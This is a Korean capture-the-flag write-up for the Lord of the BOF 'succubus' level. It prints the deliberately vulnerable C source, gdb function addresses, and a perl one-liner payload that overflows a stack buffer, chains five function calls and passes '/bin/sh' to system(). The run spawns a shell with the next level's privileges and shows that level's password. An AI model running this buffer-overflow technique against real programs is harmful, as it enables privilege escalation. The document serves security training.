

해커스쿨 LOB ( zombie_assassin -> succubus ) by ORANG

LOB_zombie_assassin


[zombie_assassin@localhost zombie_assassin]$ bash2

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/


#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>


// the inspector

// Stage counter for the DO -> GYE -> GUL -> YUT -> MO chain: DO sets it to 1,
// each later stage exits unless it holds the previous stage's value and then
// bumps it, and MO refuses to run unless it has reached 4.
int check = 0;


/*
 * Final stage of the chain.  Runs only when the four earlier stages have
 * advanced `check` to 4; any other value ends the process at once.
 * `cmd` is handed to system() unmodified, so whatever reaches this
 * parameter is executed by the shell as-is.
 */
void MO(char *cmd)
{
        if (check == 4) {
                puts("welcome to the MO!");
                // olleh!
                system(cmd);
                return;
        }
        exit(0);
}


/*
 * Fourth stage.  Requires `check` == 3 (left by GUL); on success it prints
 * its greeting and sets `check` to 4 for MO.  Otherwise the process exits.
 */
void YUT(void)
{
        if (check == 3) {
                puts("welcome to the YUT!");
                check = 4;
                return;
        }
        exit(0);
}


/*
 * Third stage.  Requires `check` == 2 (left by GYE) and advances it to 3
 * for YUT; any other value terminates the process.
 */
void GUL(void)
{
        if (check != 2) {
                exit(0);
        }
        fputs("welcome to the GUL!\n", stdout);
        check = 3;
}


/*
 * Second stage.  Requires `check` == 1 (left by DO) and advances it to 2
 * for GUL; any other value terminates the process.
 */
void GYE(void)
{
        if (check == 1) {
                fputs("welcome to the GYE!\n", stdout);
                check = 2;
        } else {
                exit(0);
        }
}


/*
 * First stage of the chain.  Has no precondition: it prints its greeting
 * and sets `check` to 1 so that GYE may run next.
 */
void DO(void)
{
        fputs("welcome to the DO!\n", stdout);
        check = 1;
}


// Entry point.  Validates argv[1] against two byte-level rules, copies it into
// a fixed 40-byte stack buffer with an unbounded strcpy (the author's own
// "overflow!" marker), then zeroes large stretches of the stack around that
// buffer.  Note: `main` is declared without a return type and strchr/memcmp/
// strcpy/memset are used without <string.h>; both rely on pre-C99 implicit
// declarations and will not compile as C99/C11.
main(int argc, char *argv[])
{
// 40-byte stack buffer; strcpy below copies argv[1] into it with no bound.
char buffer[40];
char *addr;

if(argc < 2){
printf("argv error\n");
exit(0);
}

// you cannot use library
// Rejects argv[1] if it contains the byte 0x40 ('@') anywhere.
if(strchr(argv[1], '\x40')){
printf("You cannot use library\n");
exit(0);
}

// check address
// Requires the 4 bytes at offset 44 of argv[1] to equal the address of DO.
// Nothing checks that argv[1] is at least 48 bytes long first, so a shorter
// argument makes memcmp read past the end of the string.
addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");
                exit(0);
        }

        // overflow!
        // Unbounded copy of argv[1] into the 40-byte buffer: no length check
        // at all, so any argument longer than 39 bytes writes past `buffer`.
        strcpy(buffer, argv[1]);
printf("%s\n", buffer);

        // stack destroyer
// 100 : extra space for copied argv[1]
        // Clears the buffer plus 4 bytes beyond it (44 > sizeof buffer).
        memset(buffer, 0, 44);
// Zeroes everything from 148 bytes past `buffer` up to 0xbfffffff, which the
// author assumes is the top of the stack (32-bit layout — holds only there).
// Writing outside `buffer` this way is undefined behavior in standard C.
memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

// LD_* eraser
// 40 : extra space for memset function
// Zeroes 2960 bytes starting 3000 bytes below `buffer`, again outside the
// object; the author's intent is to wipe LD_* environment data there.
memset(buffer-3000, 0, 3000-40);
}


bash2 띄우고 ~ 소스를 보니 도개걸윷모 윷놀이 같네요

도,개,걸,윷,모 순서대로 함수를 호출하면, system(cmd)까지 도달할 수 있습니다.

함수를 연속적으로 호출한 후, 마지막 MO함수에서는 dummy(4) 에 *cmd를 전달해줘야겠네요



(gdb) disas DO

Dump of assembler code for function DO:

0x80487ec <DO>: push   %ebp


Dump of assembler code for function GYE:

0x80487bc <GYE>: push   %ebp


(gdb) disas GUL

Dump of assembler code for function GUL:

0x804878c <GUL>: push   %ebp


(gdb) disas YUT

Dump of assembler code for function YUT:

0x804875c <YUT>: push   %ebp


(gdb) disas MO

Dump of assembler code for function MO:

0x8048724 <MO>: push   %ebp 



dummy(44) + DO + GYE + GUL + YUT + MO + dummy(4) + &"/bin/sh" 로 공격해 보겠습니다.

"/bin/sh"를 직접 넣어주고, 그 주소를 전달하였습니다.



[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e'print "A"x44, "\xec\x87\x04\x08","\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\x28\xfa\xff\xbf", "\x2f\x62\x69\x6e\x2f\x73\x68"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\$AAAA(/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ my-pass

euid = 517

here to stay      

                        ̀


성공!!